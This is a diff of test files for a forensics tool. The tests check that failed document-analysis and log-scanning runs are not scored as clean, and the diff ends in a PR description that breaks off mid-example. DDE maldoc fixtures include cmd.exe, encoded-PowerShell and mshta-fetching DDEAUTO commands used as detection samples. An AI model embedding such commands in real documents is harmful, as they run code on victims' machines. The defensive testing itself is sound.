+        _capa_parser().parse_args(argv[1:])
+
+    def test_floss_argv_parses_with_static_strings(self, tmp_path: Path) -> None:
+        argv = self._argv("floss", tmp_path, include_static=True)
+        ns = _floss_parser().parse_args(argv[1:])
+        assert ns.json is True
+        assert ns.disabled_types == []
+
+    def test_floss_argv_parses_without_static_strings(self, tmp_path: Path) -> None:
+        argv = self._argv("floss", tmp_path, include_static=False)
+        ns = _floss_parser().parse_args(argv[1:])
+        assert ns.disabled_types == ["static"]
+        assert ns.sample.endswith("sample.bin")
+
+    def test_floss_sample_precedes_the_type_flags(self, tmp_path: Path) -> None:
+        """`--no static <sample>` still exits 2: nargs="+" eats the path."""
+        argv = self._argv("floss", tmp_path, include_static=False)
+        assert argv.index("--no") > argv.index(next(a for a in argv if a.endswith("sample.bin")))
 
 
 class TestChainsawArgv:

--- a/tests/test_document_failure_reporting.py
+++ b/tests/test_document_failure_reporting.py
@@ -1,0 +1,283 @@
+"""A document analysis that did not run must not be reported as a clean document.
+
+Three ways ``analyze_office_document`` and ``analyze_pdf`` said "clean" about a
+file they had not actually examined:
+
+* **olevba.** The wrapper guarded only "non-zero exit *and* no stdout". Run
+  against a file it cannot read, olevba exits 3 and still prints a perfectly
+  valid JSON document -- one whose entry is ``{"type": "error", ...}``. It
+  parses, it carries no ``macros`` and no ``analysis``, so the wrapper returned
+  ``([], [], False)`` and ``_assess_office_risk`` scored the document
+  ``clean``. Unparseable JSON took the same path via a ``logger.warning``.
+
+  The exit code cannot carry this decision on its own: olevba's
+  ``RETURN_WARNINGS`` is **1**, so a non-zero status is how a *successful*
+  analysis reports that it found something. The failure is recognised from
+  olevba's own output instead.
+
+* **pdfid.** ``_run_pdfid`` never looked at ``returncode``. A pdfid that
+  crashed printed a traceback, matched no keyword lines, and produced an empty
+  indicator list -- identical to a PDF containing nothing risky.
+
+* **msodde.** A failure was recorded with ``logger.warning`` only, while the
+  response still carried ``dde_links: []``. The consuming agent could not tell
+  "no DDE links in this document" from "DDE analysis did not run".
+
+And one wrong verdict: ``_assess_office_risk`` was computed from VBA alone and
+short-circuited to ``clean`` whenever ``has_vba`` was false. A DDE maldoc
+carries no VBA at all -- that is the entire technique -- so a real
+``DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"`` document was reported
+clean, and its command never reached the case index either.
+
+The olevba and msodde fixtures here are copied verbatim from oletools 0.60.2.
+"""
+
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+from typing import Any
+from unittest.mock import patch
+
+import pytest
+
+import mulder.server.tools.documents as doc
+from mulder.server.tools.documents import (
+    _analyze_macros_olevba,
+    _assess_office_risk,
+    _parse_msodde_output,
+    _run_pdfid,
+)
+
+# Verbatim `python -m oletools.msodde --json dde.docx` output for a document
+# whose only content is a DDEAUTO field.
+MSODDE_DDEAUTO_JSON = json.dumps(
+    [
+        {
+            "msg": "msodde 0.60.2 - http://decalage.info/python/oletools",
+            "level": "WARNING",
+            "type": "msg",
+        },
+        {"msg": "Opening file: dde.docx", "level": "WARNING", "type": "msg"},
+        {"msg": "DDE Links:", "level": "WARNING", "type": "msg"},
+        {
+            "msg": ' DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe" ',
+            "level": "WARNING",
+            "type": "dde-link",
+        },
+    ]
+)
+
+# Verbatim `python -m oletools.olevba --json /nope/missing.doc` output, exit 3.
+OLEVBA_ERROR_JSON = json.dumps(
+    [
+        {
+            "script_name": "olevba",
+            "version": "0.60.2",
+            "url": "http://decalage.info/python/oletools",
+            "type": "MetaInformation",
+        },
+        {
+            "file": "/nope/missing.doc",
+            "type": "error",
+            "error": "PathNotFoundException",
+            "message": "Given path does not exist: '/nope/missing.doc'",
+        },
+    ]
+)
+
+OLEVBA_CLEAN_JSON = json.dumps(
+    [
+        {"script_name": "olevba", "version": "0.60.2", "type": "MetaInformation"},
+        {"file": "clean.docx", "type": "Text", "macros": [], "analysis": []},
+    ]
+)
+
+
+def _completed(
+    returncode: int = 0, stdout: str = "", stderr: str = ""
+) -> subprocess.CompletedProcess[str]:
+    return subprocess.CompletedProcess(["tool"], returncode, stdout, stderr)
+
+
+class TestOlevbaFailureIsNotACleanDocument:
+    def test_an_error_document_raises(self) -> None:
+        """The bug: valid JSON, no macros key, therefore scored clean."""
+        with (
+            patch(
+                "mulder.server.tools.documents.subprocess.run",
+                return_value=_completed(returncode=3, stdout=OLEVBA_ERROR_JSON),
+            ),
+            pytest.raises(OSError, match="Given path does not exist"),
+        ):
+            _analyze_macros_olevba(Path("/nope/missing.doc"))
+
+    def test_the_old_guard_would_not_have_fired(self) -> None:
+        """Pin the premise: the failure output is non-empty and parses."""
+        assert OLEVBA_ERROR_JSON.strip()
+        entries = json.loads(OLEVBA_ERROR_JSON)
+        assert all("macros" not in e for e in entries)
+        assert all("analysis" not in e for e in entries)
+
+    def test_unparseable_output_raises(self) -> None:
+        with (
+            patch(
+                "mulder.server.tools.documents.subprocess.run",
+                return_value=_completed(stdout="Traceback (most recent call last):"),
+            ),
+            pytest.raises(OSError, match="unparseable"),
+        ):
+            _analyze_macros_olevba(Path("/fake/doc.docm"))
+
+    def test_a_nonzero_exit_with_real_results_still_succeeds(self) -> None:
+        """olevba's RETURN_WARNINGS is 1: non-zero means *found something*.
+
+        Keying the failure decision off the exit code would turn every
+        successful analysis of an interesting document into an error.
+        """
+        from oletools.olevba import RETURN_WARNINGS
+
+        assert RETURN_WARNINGS == 1
+
+        with patch(
+            "mulder.server.tools.documents.subprocess.run",
+            return_value=_completed(returncode=RETURN_WARNINGS, stdout=OLEVBA_CLEAN_JSON),
+        ):
+            macros, indicators, has_vba = _analyze_macros_olevba(Path("/fake/doc.docm"))
+
+        assert (macros, indicators, has_vba) == ([], [], False)
+
+
+class TestPdfidFailureIsNotACleanPdf:
+    def test_a_crash_raises_instead_of_reporting_no_indicators(self) -> None:
+        with (
+            patch.object(doc, "_pdfid_script", return_value=Path("/fake/pdfid.py")),
+            patch(
+                "mulder.server.tools.documents.subprocess.run",
+                return_value=_completed(returncode=1, stderr="ImportError: no module"),
+            ),
+            pytest.raises(OSError, match="pdfid"),
+        ):
+            _run_pdfid(Path("/fake/x.pdf"))
+
+    def test_a_nonzero_exit_that_still_printed_indicators_keeps_them(self) -> None:
+        """Partial output is kept; only "nothing at all" is a failure."""
+        stdout = " /JavaScript            2\n /OpenAction            1\n"
+        with (
+            patch.object(doc, "_pdfid_script", return_value=Path("/fake/pdfid.py")),
+            patch(
+                "mulder.server.tools.documents.subprocess.run",
+                return_value=_completed(returncode=1, stdout=stdout),
+            ),
+        ):
+            indicators = _run_pdfid(Path("/fake/x.pdf"))
+
+        assert {str(i["keyword"]) for i in indicators} == {"/JavaScript", "/OpenAction"}
+
+    def test_a_clean_pdf_is_still_clean(self) -> None:
+        with (
+            patch.object(doc, "_pdfid_script", return_value=Path("/fake/pdfid.py")),
+            patch(
+                "mulder.server.tools.documents.subprocess.run",
+                return_value=_completed(stdout=" /JavaScript            0\n"),
+            ),
+        ):
+            assert _run_pdfid(Path("/fake/x.pdf")) == []
+
+
+class TestDdeChangesTheVerdict:
+    """A DDE maldoc has no VBA, so a VBA-only verdict calls it clean."""
+
+    def test_a_ddeauto_document_is_not_clean(self) -> None:
+        links = _parse_msodde_output(MSODDE_DDEAUTO_JSON)
+        assert links, "the fixture must contain a link for this test to mean anything"
+
+        assert _assess_office_risk([], False)["risk_level"] == "clean"
+        assert _assess_office_risk([], False, links)["risk_level"] == "malicious"
+
+    def test_a_non_auto_dde_link_is_high_not_malicious(self) -> None:
+        links = [{"field_type": "DDE", "command": "DDE cmd.exe", "risk": "high"}]
+        assert _assess_office_risk([], False, links)["risk_level"] == "high"
+
+    def test_the_reason_names_the_finding(self) -> None:
+        links = _parse_msodde_output(MSODDE_DDEAUTO_JSON)
+        risk = _assess_office_risk([], False, links)
+        assert any("DDE" in str(r) for r in risk["reasons"])  # type: ignore[union-attr]
+        assert risk["dde_links_present"] is True
+
+    def test_a_document_with_no_dde_is_unaffected(self) -> None:
+        assert _assess_office_risk([], False, []) == _assess_office_risk([], False)
+
+
+class TestTheOfficeResponseSaysWhetherDdeRan:
+    @staticmethod
+    def _run(tmp_path: Path, msodde: subprocess.CompletedProcess[str]) -> dict[str, Any]:
+        target = tmp_path / "doc.docx"
+        target.write_bytes(b"PK\x03\x04")
+        captured: dict[str, Any] = {}
+
+        def capture_response(
+            tc_id: str, tool_name: str, params: object, results: object, *a: object
+        ) -> dict[str, object]:
+            if isinstance(results, dict):
+                captured.update(results)
+            return {"status": "success"}
+
+        def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+            if "oletools.msodde" in cmd:
+                return msodde
+            return _completed(stdout=OLEVBA_CLEAN_JSON)
+
+        with (
+            patch("mulder.server.tools.documents.subprocess.run", side_effect=fake_run),
+            patch.object(doc, "extract_and_index", return_value={}),
+            patch.object(doc, "tool_response", capture_response),
+        ):
+            doc.analyze_office_document.__wrapped__(  # type: ignore[attr-defined]
+                "case-1", str(target), analyze_dde=True
+            )
+        return captured
+
+    def test_a_successful_run_is_marked_analysed(self, tmp_path: Path) -> None:
+        summary = self._run(tmp_path, _completed(stdout=MSODDE_DDEAUTO_JSON))
+        assert summary["dde_analyzed"] is True
+        assert summary["dde_links"]
+        assert "warning" not in summary
+
+    def test_a_failed_run_is_not_reported_as_no_links(self, tmp_path: Path) -> None:
+        """`dde_links: []` alone cannot distinguish clean from did-not-run."""
+        summary = self._run(tmp_path, _completed(returncode=1, stderr="msodde: cannot open file"))
+        assert summary["dde_links"] == []
+        assert summary["dde_analyzed"] is False
+        assert "did not run" in str(summary["warning"])
+
+
+class TestTheDdeCommandReachesTheIndex:
+    def test_the_indexed_text_carries_the_command(self, tmp_path: Path) -> None:
+        """A case-wide search for cmd.exe must be able to find the payload."""
+        target = tmp_path / "doc.docx"
+        target.write_bytes(b"PK\x03\x04")
+        indexed: list[str] = []
+
+        def fake_index(text: str, *a: object, **k: object) -> dict[str, object]:
+            indexed.append(text)
+            return {}
+
+        def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+            if "oletools.msodde" in cmd:
+                return _completed(stdout=MSODDE_DDEAUTO_JSON)
+            return _completed(stdout=OLEVBA_CLEAN_JSON)
+
+        with (
+            patch("mulder.server.tools.documents.subprocess.run", side_effect=fake_run),
+            patch.object(doc, "extract_and_index", side_effect=fake_index),
+            patch.object(doc, "tool_response", lambda *a, **k: {"status": "success"}),
+        ):
+            doc.analyze_office_document.__wrapped__(  # type: ignore[attr-defined]
+                "case-1", str(target), analyze_dde=True
+            )
+
+        assert indexed
+        assert "cmd.exe" in indexed[0]
+        assert "DDEAUTO" in indexed[0]

--- a/tests/test_document_failure_reporting.py
+++ b/tests/test_document_failure_reporting.py
@@ -200,6 +200,26 @@ class TestDdeChangesTheVerdict:
         links = [{"field_type": "DDE", "command": "DDE cmd.exe", "risk": "high"}]
         assert _assess_office_risk([], False, links)["risk_level"] == "high"
 
+    def test_an_auto_link_to_a_benign_target_is_high_not_malicious(self) -> None:
+        """A DDEAUTO to another spreadsheet is legitimate, if rare.
+
+        "malicious" is reserved for the same combination the VBA path reserves
+        it for: an automatic trigger meeting an executor.
+        """
+        links = [
+            {"field_type": "DDEAUTO", "command": 'DDEAUTO Excel "C:\\book.xlsx"'},
+        ]
+        assert _assess_office_risk([], False, links)["risk_level"] == "high"
+
+    def test_an_auto_link_to_an_interpreter_is_malicious(self) -> None:
+        for command in (
+            "DDEAUTO powershell -enc AAA",
+            "DDEAUTO mshta http://x/a.hta",
+            "DDEAUTO c:\\windows\\system32\\cmd.exe /k calc",
+        ):
+            links = [{"field_type": "DDEAUTO", "command": command}]
+            assert _assess_office_risk([], False, links)["risk_level"] == "malicious", command
+
     def test_the_reason_names_the_finding(self) -> None:
         links = _parse_msodde_output(MSODDE_DDEAUTO_JSON)
         risk = _assess_office_risk([], False, links)
@@ -281,3 +301,80 @@ class TestTheDdeCommandReachesTheIndex:
         assert indexed
         assert "cmd.exe" in indexed[0]
         assert "DDEAUTO" in indexed[0]
+
+
+class TestTheWarningSurvivesTheResponseEnvelope:
+    """Setting a key on the results dict is not enough to reach the agent.
+
+    ``tool_response`` with a *source* returns a compact envelope --
+    ``tool_call_id``, ``status``, ``source``, a 500-char ``preview`` and a
+    ``hint`` -- and drops every other key. A degraded-run marker placed in the
+    results therefore never reached the caller: the agent read a preview with
+    no findings and concluded the evidence was clean, which is the failure this
+    PR exists to prevent.
+
+    These tests call the real ``tool_response``, not a capturing stand-in.
+    """
+
+    def test_a_warning_is_forwarded(self) -> None:
+        from mulder.server.helpers import tool_response
+
+        resp = tool_response(
+            "tc_1",
+            "run_thing",
+            {},
+            {"findings": [], "warning": "msodde exited 1; DDE analysis did not run"},
+            "some.source",
+        )
+        assert "did not run" in str(resp["warning"])
+
+    def test_a_partial_marker_is_forwarded(self) -> None:
+        from mulder.server.helpers import tool_response
+
+        resp = tool_response(
+            "tc_1", "run_thing", {}, {"partial": True, "features_indexed": 2}, "bulk"
+        )
+        assert resp["partial"] is True
+
+    def test_a_clean_run_carries_neither(self) -> None:
+        from mulder.server.helpers import tool_response
+
+        resp = tool_response("tc_1", "run_thing", {}, {"findings": []}, "some.source")
+        assert "warning" not in resp
+        assert "partial" not in resp
+
+    def test_the_envelope_is_still_compact(self) -> None:
+        """The forwarding must not smuggle the whole result back in."""
+        from mulder.server.helpers import tool_response
+
+        resp = tool_response(
+            "tc_1",
+            "run_thing",
+            {},
+            {"findings": [{"x": 1}], "warning": "w"},
+            "some.source",
+        )
+        assert "findings" not in resp
+
+    def test_a_failed_dde_run_reaches_the_agent(self, tmp_path: Path) -> None:
+        """End to end, through the real envelope."""
+        from mulder.server.helpers import tool_response
+
+        target = tmp_path / "doc.docx"
+        target.write_bytes(b"PK\x03\x04")
+
+        def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+            if "oletools.msodde" in cmd:
+                return _completed(returncode=1, stderr="msodde: cannot open file")
+            return _completed(stdout=OLEVBA_CLEAN_JSON)
+
+        with (
+            patch("mulder.server.tools.documents.subprocess.run", side_effect=fake_run),
+            patch.object(doc, "extract_and_index", return_value={}),
+            patch.object(doc, "tool_response", tool_response),
+        ):
+            resp = doc.analyze_office_document.__wrapped__(  # type: ignore[attr-defined]
+                "case-1", str(target), analyze_dde=True
+            )
+
+        assert "did not run" in str(resp["warning"])

--- a/tests/test_tool_exit_codes.py
+++ b/tests/test_tool_exit_codes.py
@@ -1,0 +1,174 @@
+"""A CLI tool that failed must not be reported as a clean scan.
+
+Every wrapped tool below used to discard its ``CompletedProcess``. When the
+tool exited non-zero and wrote nothing, the parser found no output file and
+returned "0 detections", which the MCP layer rendered as a **successful**
+tool call. That is a false negative that looks like a clean result -- the
+single worst outcome for a DFIR tool.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+from typing import Any
+from unittest.mock import patch
+
+from mulder.server.helpers import classify_tool_exit
+
+
+def _completed(
+    returncode: int = 0, stdout: str = "", stderr: str = ""
+) -> subprocess.CompletedProcess[str]:
+    return subprocess.CompletedProcess(
+        args=[], returncode=returncode, stdout=stdout, stderr=stderr
+    )
+
+
+class TestClassifyToolExit:
+    def test_zero_exit_is_ok(self) -> None:
+        verdict, message = classify_tool_exit(_completed(), "x", produced_output=False)
+        assert verdict == "ok"
+        assert message == ""
+
+    def test_nonzero_without_output_is_failed(self) -> None:
+        verdict, message = classify_tool_exit(
+            _completed(2, stderr="required argument --mapping"), "chainsaw", produced_output=False
+        )
+        assert verdict == "failed"
+        assert "chainsaw exited 2" in message
+        assert "--mapping" in message
+
+    def test_nonzero_with_output_is_partial_not_failed(self) -> None:
+        """chainsaw exits non-zero on one unreadable file without --skip-errors."""
+        verdict, message = classify_tool_exit(
+            _completed(1, stderr="failed to load a.evtx"), "chainsaw", produced_output=True
+        )
+        assert verdict == "partial"
+        assert "may be incomplete" in message
+
+    def test_stdout_is_used_when_stderr_is_empty(self) -> None:
+        _, message = classify_tool_exit(
+            _completed(1, stdout="boom"), "photorec", produced_output=False
+        )
+        assert "boom" in message
+
+    def test_message_is_bounded(self) -> None:
+        _, message = classify_tool_exit(
+            _completed(1, stderr="x" * 10_000), "t", produced_output=False
+        )
+        assert len(message) < 800
+
+
+class TestRunCliTool:
+    @staticmethod
+    def _run(tmp_path: Path, proc: subprocess.CompletedProcess[str]) -> dict[str, object]:
+        from mulder.server import helpers as h
+
+        target = tmp_path / "evidence.bin"
+        target.write_bytes(b"\x00")
+        with (
+            patch.object(h, "require_binary", return_value="/usr/bin/strings"),
+            patch.object(h, "run_subprocess", return_value=proc),
+            patch(
+                "mulder.server.extract_helpers.extract_and_index",
+                return_value={"line_count": 1},
+            ),
+        ):
+            return h.run_cli_tool(
+                binary="strings",
+                cmd=["strings", str(target)],
+                tool_name="run_strings",
+                params={},
+                source_name="strings.output",
+                source_path=str(target),
+                extractor_label="strings",
+            )
+
+    def test_failed_tool_is_an_error_not_an_empty_success(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, _completed(1, stderr="No such file"))
+        assert result["status"] == "error"
+        assert result["error_type"] == "tool_failed"
+
+    def test_partial_run_keeps_results_and_warns(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, _completed(1, stdout="hello", stderr="one file unreadable"))
+        assert result["status"] == "success"
+        assert "may be incomplete" in str(result["warning"])
+
+    def test_clean_run_has_no_warning(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, _completed(0, stdout="hello"))
+        assert result["status"] == "success"
+        assert "warning" not in result
+
+
+class TestChainsawExitStatus:
+    @staticmethod
+    def _run(tmp_path: Path, returncode: int, write_output: bool) -> dict[str, object]:
+        from mulder.server.tools import chainsaw as cs
+
+        binary = tmp_path / "chainsaw"
+        binary.write_text("#!/bin/sh\n")
+        binary.chmod(0o755)
+        mapping = tmp_path / "sigma-event-logs-all.yml"
+        mapping.write_text("")
+        evidence = tmp_path / "evtx"
+        evidence.mkdir()
+
+        def fake_run(cmd: list[str], **kwargs: Any) -> subprocess.CompletedProcess[str]:
+            if write_output:
+                out = Path(cmd[cmd.index("--output") + 1])
+                out.write_text("[]")
+            return _completed(returncode, stderr="required arguments were not provided")
+
+        with (
+            patch.object(cs, "sources_already_indexed", return_value=[]),
+            patch("mulder.server.helpers.shutil.which", return_value=str(binary)),
+            patch.object(cs, "_default_chainsaw_mapping", return_value=mapping),
+            patch.object(cs, "extract_and_index", return_value={}),
+            patch.object(cs.subprocess, "run", side_effect=fake_run),
+        ):
+            return cs.run_chainsaw.__wrapped__(str(evidence))  # type: ignore[attr-defined]
+
+    def test_exit_two_with_no_results_file_is_an_error(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, returncode=2, write_output=False)
+        assert result["status"] == "error"
+        assert result["error_type"] == "tool_failed"
+
+    def test_clean_run_still_succeeds(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, returncode=0, write_output=True)
+        assert result["status"] == "success"
+
+    def test_partial_run_keeps_the_detections(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, returncode=1, write_output=True)
+        assert result["status"] == "success"
+        assert "may be incomplete" in str(result["warning"])
+
+
+class TestZircoliteExitStatus:
+    def test_failed_run_is_an_error(self, tmp_path: Path) -> None:
+        from mulder.server.tools import zircolite as zc
+
+        events = tmp_path / "events"
+        events.mkdir()
+        script = tmp_path / "zircolite.py"
+        script.write_text("")
+        ruleset = tmp_path / "rules.json"
+        ruleset.write_text("[]")
+
+        with (
+            patch.object(zc, "sources_already_indexed", return_value=[]),
+            patch.object(zc, "_zircolite_script", return_value=script),
+            patch.object(zc, "_missing_zircolite_modules", return_value=[]),
+            patch.object(zc, "extract_and_index", return_value={}),
+            patch.object(
+                zc.subprocess,
+                "run",
+                return_value=_completed(2, stderr="unrecognized arguments: --json"),
+            ),
+        ):
+            result = zc.run_zircolite.__wrapped__(  # type: ignore[attr-defined]
+                str(events), ruleset_path=str(ruleset)
+            )
+
+        assert result["status"] == "error"
+        assert result["error_type"] == "tool_failed"

--- a/tests/test_tool_exit_codes.py
+++ b/tests/test_tool_exit_codes.py
@@ -172,3 +172,48 @@ class TestZircoliteExitStatus:
 
         assert result["status"] == "error"
         assert result["error_type"] == "tool_failed"
+
+
+class TestReadpstExitStatus:
+    """A failed readpst reported an empty mailbox, not a failure."""
+
+    @staticmethod
+    def _run(tmp_path: Path, returncode: int, write_eml: bool) -> dict[str, object]:
+        from mulder.server.tools import email as em
+
+        pst = tmp_path / "archive.pst"
+        pst.write_bytes(b"!BDN")
+
+        def fake_run(cmd: list[str], **kwargs: Any) -> subprocess.CompletedProcess[str]:
+            out = Path(cmd[cmd.index("-o") + 1])
+            if write_eml:
+                folder = out / "Inbox"
+                folder.mkdir(parents=True, exist_ok=True)
+                (folder / "1.eml").write_text(
+                    "Subject: hello\r\nFrom: a@x\r\nTo: b@x\r\n"
+                    "Date: Mon, 11 Mar 2024 09:14:02 +0100\r\n"
+                    "Content-Type: text/plain\r\n\r\nbody\r\n"
+                )
+            return _completed(returncode, stderr="Error: cannot read PST header")
+
+        with (
+            patch.object(em, "require_binary", return_value="/usr/bin/readpst"),
+            patch.object(em, "extract_and_index", return_value={}),
+            patch.object(em.subprocess, "run", side_effect=fake_run),
+        ):
+            return em.parse_pst.__wrapped__("case-1", str(pst))  # type: ignore[attr-defined]
+
+    def test_a_failed_extraction_is_an_error_not_an_empty_mailbox(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, returncode=1, write_eml=False)
+        assert result["status"] == "error"
+        assert result["error_type"] == "tool_failed"
+
+    def test_a_clean_run_succeeds(self, tmp_path: Path) -> None:
+        result = self._run(tmp_path, returncode=0, write_eml=True)
+        assert result["status"] == "success"
+
+    def test_a_partial_extraction_keeps_the_messages(self, tmp_path: Path) -> None:
+        """readpst exits non-zero on one unreadable folder; the rest is real."""
+        result = self._run(tmp_path, returncode=1, write_eml=True)
+        assert result["status"] == "success"
+        assert "may be incomplete" in str(result["warning"])

--- a/tests/test_triage_verdict_indexing.py
+++ b/tests/test_triage_verdict_indexing.py
@@ -1,0 +1,158 @@
+"""The triage analysis existed only inside the function that computed it.
+
+``triage_binary`` derives ``file_info``, ``timestamps``, ``packing_indicators``,
+``suspicious_imports`` and ``triage_verdict``, attaches them to a dict, and
+hands that to ``tool_response(..., source="binary.triage", ...)``. Because a
+source is given, `tool_response` returns a compact envelope and replaces the
+dict with ``json.dumps(results)[:500]`` -- and JSON preserves insertion order,
+so the preview is consumed by ``extract_and_index``'s own keys plus
+``file_info`` and part of ``timestamps``. The packing indicators, the
+suspicious imports and the verdict are cut off.
+
+The fallback would be the case index, but only the raw rabin2 JSON was
+indexed. ``search(source="binary.triage")`` returned register dumps and string
+tables containing no verdict. So the analysis reached nobody: the agent saw a
+truncated preview, and an analyst searching the case for ``UPX`` found the
+section name but never the tool's conclusion about it.
+
+The derived findings are now indexed ahead of the raw output, which is both
+what makes them searchable and what puts them inside the preview window.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+from unittest.mock import patch
+
+import mulder.server.tools.binary as binary
+from mulder.server.tools.binary import _triage_findings_text
+
+INFO_JSON = (
+    '{"info": {"arch": "x86", "bits": 64, "bintype": "pe", "os": "windows",'
+    ' "compiled": "1741772463", "compiler": "msvc"}}'
+)
+IMPORTS_JSON = (
+    '{"imports": [{"name": "VirtualAllocEx"}, {"name": "WriteProcessMemory"},'
+    ' {"name": "CreateRemoteThread"}]}'
+)
+SECTIONS_JSON = (
+    '{"sections": [{"name": "UPX0", "vsize": 4096, "size": 0, "perm": "-rwx"},'
+    ' {"name": "UPX1", "vsize": 4096, "size": 2048, "perm": "-r-x"}]}'
+)
+
+
+def _completed(
+    returncode: int = 0, stdout: str = "", stderr: str = ""
+) -> subprocess.CompletedProcess[str]:
+    return subprocess.CompletedProcess(["rabin2"], returncode, stdout, stderr)
+
+
+def _run_triage(tmp_path: Path) -> tuple[str, dict[str, object]]:
+    """Drive triage_binary, returning (indexed_text, results-passed-to-response)."""
+    target = tmp_path / "sample.exe"
+    target.write_bytes(b"MZ" + b"\x00" * 64)
+
+    indexed: list[str] = []
+    captured: dict[str, object] = {}
+
+    def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+        flag = cmd[1] if len(cmd) > 1 else ""
+        return {
+            "-Ij": _completed(stdout=INFO_JSON),
+            "-ij": _completed(stdout=IMPORTS_JSON),
+            "-Sj": _completed(stdout=SECTIONS_JSON),
+        }.get(flag, _completed(stdout="{}"))
+
+    def fake_index(text: str, *a: object, **k: object) -> dict[str, object]:
+        indexed.append(text)
+        return {"source_name": "binary.triage", "windows_indexed": 1, "line_count": 10}
+
+    def capture_response(
+        tc_id: str, tool_name: str, params: object, results: object, *a: object
+    ) -> dict[str, object]:
+        if isinstance(results, dict):
+            captured.update(results)
+        return {"status": "success"}
+
+    with (
+        patch("mulder.server.tools.binary.subprocess.run", side_effect=fake_run),
+        patch.object(binary, "require_binary", return_value="/usr/bin/rabin2"),
+        patch.object(binary, "extract_and_index", side_effect=fake_index),
+        patch.object(binary, "tool_response", capture_response),
+    ):
+        binary.triage_binary.__wrapped__(  # type: ignore[attr-defined]
+            "case-1", str(target), depth="standard"
+        )
+
+    assert indexed, "extract_and_index was never called"
+    return indexed[0], captured
+
+
+class TestTheVerdictIsRecoverable:
+    def test_the_verdict_is_in_the_indexed_text(self, tmp_path: Path) -> None:
+        text, results = _run_triage(tmp_path)
+        classification = str(results["triage_verdict"]["classification"])  # type: ignore[index]
+        assert classification in text
+
+    def test_the_packing_indicators_are_searchable(self, tmp_path: Path) -> None:
+        """An analyst searching the case for UPX must reach the conclusion."""
+        text, results = _run_triage(tmp_path)
+        assert results["packing_indicators"], "the fixture must trip the packing check"
+        for indicator in results["packing_indicators"]:  # type: ignore[union-attr]
+            assert str(indicator) in text
+
+    def test_the_suspicious_imports_are_searchable(self, tmp_path: Path) -> None:
+        text, _ = _run_triage(tmp_path)
+        assert "VirtualAllocEx" in text
+        assert "CreateRemoteThread" in text
+
+    def test_the_raw_output_is_still_indexed(self, tmp_path: Path) -> None:
+        """The findings are added to the raw output, not substituted for it."""
+        text, _ = _run_triage(tmp_path)
+        assert "UPX0" in text
+        assert '"bintype"' in text
+
+
+class TestTheFindingsSurviveThePreview:
+    def test_the_verdict_is_inside_the_first_500_characters(self, tmp_path: Path) -> None:
+        """`tool_response` cuts the preview at 500 characters.
+
+        Putting the derived findings first is what makes them visible to an
+        agent reading the response, rather than only to a later search.
+        """
+        text, results = _run_triage(tmp_path)
+        classification = str(results["triage_verdict"]["classification"])  # type: ignore[index]
+        assert classification in text[:500]
+
+
+class TestTheRenderedFindings:
+    def test_it_names_the_classification_and_confidence(self) -> None:
+        rendered = _triage_findings_text(
+            {"arch": "x86", "bits": 64, "os": "windows"},
+            {"parsed_utc": "2025-03-12T09:41:03+00:00", "validity": "valid"},
+            [],
+            {},
+            {"classification": "benign_indicators", "confidence": "medium", "reasons": []},
+        )
+        assert "benign_indicators" in rendered
+        assert "confidence medium" in rendered
+
+    def test_it_names_every_suspicious_api(self) -> None:
+        rendered = _triage_findings_text(
+            {},
+            {"validity": "valid"},
+            ["high-entropy section UPX1"],
+            {"process_injection": ["VirtualAllocEx", "CreateRemoteThread"]},
+            {"classification": "malicious_indicators", "confidence": "high", "reasons": ["x"]},
+        )
+        assert "VirtualAllocEx" in rendered
+        assert "CreateRemoteThread" in rendered
+        assert "high-entropy section UPX1" in rendered
+        assert "Reason: x" in rendered
+
+    def test_a_missing_timestamp_is_rendered_not_dropped(self) -> None:
+        rendered = _triage_findings_text(
+            {}, {"parsed_utc": None, "validity": "suspicious"}, [], {}, {}
+        )
+        assert "Compilation timestamp: none [suspicious]" in rendered


### PR DESCRIPTION
## BLUF

- **`triage_binary`'s analysis reached nobody.** The verdict, packing indicators and suspicious imports were computed, attached to the results dict, and then dropped by the response envelope.
- **`tool_response` with a `source` returns `json.dumps(results)[:500]`.** JSON preserves insertion order, so the preview is consumed by `extract_and_index`'s keys plus `file_info` and part of `timestamps` — everything after that is cut.
- **The case index was no fallback:** only the raw rabin2 JSON was indexed. `search(source="binary.triage")` returned section tables and string dumps containing no verdict.
- **Result:** an analyst searching a case for `UPX` found the section name but never the tool's conclusion about it, and the calling agent saw a truncated preview with no findings in it.
- **Fix:** render the derived findings as text and index them ahead of the raw output — which both makes them searchable and puts them inside the preview window.
- **Risk:** Low. Purely additive; the raw rabin2 output is still indexed, after the findings rather than instead of them.

## Priority

**high** — the entire point of `triage_binary` is the verdict, and the verdict was unreachable by either route the tool offers.

## Stacked on #70

Based on `fix/tool-exit-codes`, which touches the same function (`triage_binary` must not report an unanalysed binary as benign). Review #69 → #70 → this.

Same root cause as #74 (*index the detections, not just how many there were*), applied to a different tool. #74 is a sibling, not a parent — it branched before #70's later commits, so this is a separate branch rather than another commit on it.

## What was lost

```python
summary["file_info"]          = file_info
summary["timestamps"]         = timestamp
summary["packing_indicators"] = packing_indicators   # cut
summary["suspicious_imports"] = suspicious_imports   # cut
summary["triage_verdict"]     = verdict              # cut
...
return tool_response(tc_id, "triage_binary", params, summary, "binary.triage", elapsed)
```

and the indexed text was `"\n\n".join(raw_parts)` — five `json.dumps` renderings of rabin2 output, and nothing else.

## After

The findings go in first:

```
Triage verdict: malicious_indicators (confidence high)
Reason: 2 packing indicator(s) detected
Reason: process_injection: 3 suspicious API(s)
Format: x86 64-bit windows
Compiler: msvc
Compilation timestamp: 2025-03-12T09:41:03+00:00 [valid]
Packing indicator: high-entropy section UPX1
